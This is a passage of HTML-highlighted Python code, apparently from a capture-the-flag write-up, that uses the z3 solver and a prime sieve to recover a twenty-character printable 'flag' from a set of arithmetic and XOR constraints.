class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">):<\/span>\n            <span class=\"n\" style=\"background: #263238;color: #EFF\">multiples<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">append<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">j<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n\n     <span class=\"k\" style=\"background: #263238;color: #BB80B3\">return<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">primes<\/span>\n\n<span class=\"n\" style=\"background: #263238;color: #EFF\">prime<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">sieve<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">100<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">10<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">BitVec<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"num[<\/span><span class=\"si\" style=\"background: #263238;color: #89DDFF\">%d<\/span><span class=\"s2\" style=\"background: #263238;color: #C3E88D\">]\"<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">%<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">32<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">range<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)]<\/span>\n\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">Solver<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">()<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">flag<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"\"<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">5<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">7<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">9<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">4<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">8<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">71<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">17<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">2<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">19<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;&lt;<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">6<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">19<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">19<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;&lt;<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">90<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">67668<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">4<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;&lt;<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">9<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">70<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1703936<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">5<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">80<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">109<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">6<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">11615<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">71<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">19<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">33<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">9<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">84<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">14<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">5<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">10<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">8<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span>  <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">21<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">10<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">5<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">108<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">11<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">115<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">12<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&gt;<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">4<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">6<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">13<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">14<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">2<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">15<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">12<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">18<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">12<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">50<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">16<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">19<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">138<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">17<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">10<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">18<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">prime<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">79<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span> \n\n<span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">#solution has to be printable ascii<\/span>\n<span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">range<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">len<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)):<\/span>\n     <span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">add<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;=<\/span> <span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x20<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;=<\/span> <span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x7f<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n\n<span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">check<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">()<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">sat<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">:<\/span>\n     <span class=\"n\" style=\"background: #263238;color: 